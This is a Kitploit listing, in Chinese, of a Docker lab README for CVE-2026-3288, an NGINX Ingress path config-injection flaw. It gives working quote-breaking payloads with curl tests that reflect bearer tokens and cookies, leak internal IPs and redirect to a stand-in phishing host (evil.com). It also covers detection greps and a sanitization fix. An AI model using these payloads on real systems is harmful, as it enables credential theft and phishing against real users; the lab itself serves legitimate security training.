Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/bvabhishek/cve-2026-3288-lab
云基础设施安全容器安全漏洞分析漏洞利用Web应用程序漏洞利用配置审计渗透测试学习与教育实验室与实践
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

基于 Docker 的漏洞实验环境,用于 CVE-2026-3288 NGINX Ingress 配置注入,包含漏洞利用脚本、检测监控以及针对授权安全培训的修复指导。

14个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-3288 漏洞实验环境(Docker)

NGINX Ingress Controller 配置注入

⚠️ 警告:本实验环境包含故意配置的漏洞,仅供授权安全培训使用

漏洞概述

CVE-2026-3288(CVSS 8.8 高危)— NGINX Ingress Controller 中的配置注入漏洞

  • 受影响版本:< v1.13.8、v1.14.4、v1.15.0
  • 攻击向量:路径配置中的双引号(")注入
  • 影响:远程代码执行、机密信息泄露、凭据窃取
  • 相关漏洞:CVE-2026-24512(类似的路径注入)

根本原因

buildProxyPass() 函数在将路径输入插入 nginx 配置之前未对其进行清理,导致攻击者能够突破引号字符串并注入任意 nginx 指令。

实验环境组件

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # 本文件
├── docker-compose.yml                 # 主实验环境配置
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # 存在漏洞的 NGINX 配置
│   │   ├── nginx.conf                # 基础配置
│   │   └── vulnerable-config.conf    # 存在漏洞的路径处理
│   └── backend/
│       ├── Dockerfile                # 简单后端应用
│       └── app.py                    # Flask 应用
├── exploits/
│   ├── exploit.py                    # 自动化利用脚本
│   ├── payloads.txt                  # 漏洞利用载荷集合
│   └── test-exploits.sh              # 测试所有漏洞利用
├── detection/
│   └── monitor-logs.sh               # 监控漏洞利用尝试
└── cleanup/
    └── cleanup.sh                    # 移除所有实验环境资源

前置条件

  • 已安装 Docker
  • 已安装 Docker Compose
  • Python 3.6+(用于漏洞利用脚本)
  • curl 或 wget
  • 最低 2GB 内存

快速开始

1. 启动实验环境

root@kitploit:~
cd CVE-2026-3288-lab

# 启动存在漏洞的环境
docker-compose up -d

# 检查状态
docker-compose ps

2. 验证安装

root@kitploit:~
# 测试后端是否运行
curl http://localhost:8080/

# 测试 NGINX 是否运行
curl http://localhost/

3. 运行漏洞利用

root@kitploit:~
cd exploits

# 自动化漏洞利用
python3 exploit.py --all

# 或测试单个漏洞利用
bash test-exploits.sh

4. 监控日志

root@kitploit:~
# 查看 NGINX 日志中的漏洞利用行为
docker-compose logs -f nginx

# 监控检测
cd detection
bash monitor-logs.sh

5. 清理

root@kitploit:~
docker-compose down -v

攻击场景

场景 1:响应劫持

注入 nginx return 指令以提供攻击者控制的内容。

载荷:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

测试:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

场景 2:凭据窃取

将 Authorization 头反射回响应中以窃取 Bearer 令牌。

载荷:

root@kitploit:~
/login" return 200 "Token: $http_authorization

测试:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

场景 3:钓鱼重定向

将用户重定向到攻击者控制的钓鱼网站。

载荷:

root@kitploit:~
/" return 302 "https://evil.com/phishing

测试:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

场景 4:内网 IP 泄露

泄露内部服务器信息。

载荷:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

测试:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

场景 5:Cookie 窃取

窃取会话 Cookie。

载荷:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

测试:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

工作原理

存在漏洞的代码模式

root@kitploit:~
# 存在漏洞的配置
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

漏洞利用

当路径包含 " 时,它会突破引号字符串:

root@kitploit:~
# 攻击者输入:/api" return 200 "HACKED
# 结果:
location ~ "^/api" return 200 "HACKED" {
    # 原始配置已被破坏
}

检测

日志监控

root@kitploit:~
# 监控可疑模式
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

手动检测

root@kitploit:~
# 检查 NGINX 配置中是否包含注入的指令
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

修复措施

立即行动

  1. 输入验证 — 清理所有路径输入
  2. 转义特殊字符 — 正确转义 " 和 \
  3. 使用白名单 — 仅允许已知的安全路径
  4. 监控日志 — 对可疑模式发出警报

代码修复

root@kitploit:~
// 修复前(存在漏洞)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// 修复后(已修复)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

学习目标

完成本实验环境后,您将理解:

  1. ✅ 配置注入漏洞的工作原理
  2. ✅ 输入清理不足的影响
  3. ✅ 多种漏洞利用技术
  4. ✅ 通过日志分析进行检测的方法
  5. ✅ 正确的修复策略

故障排除

容器无法启动

root@kitploit:~
# 查看日志
docker-compose logs

# 重启
docker-compose restart

端口已被占用

root@kitploit:~
# 修改 docker-compose.yml 中的端口
# 或停止冲突的服务
sudo lsof -i :80

漏洞利用不生效

root@kitploit:~
# 验证 NGINX 是否运行
docker-compose ps nginx

# 检查 NGINX 配置
docker exec cve-2026-3288-nginx nginx -t

安全声明

  • ⚠️ 仅在隔离的实验环境中使用
  • ⚠️ 切勿部署到生产系统
  • ⚠️ 切勿暴露到互联网
  • ⚠️ 测试前确保获得适当授权
  • ⚠️ 遵循负责任披露实践

参考资料

  • CVE-2026-3288 公告
  • 修复 PR #14667
  • Sysdig 分析

仅用于授权的安全培训和研究目的

下载工具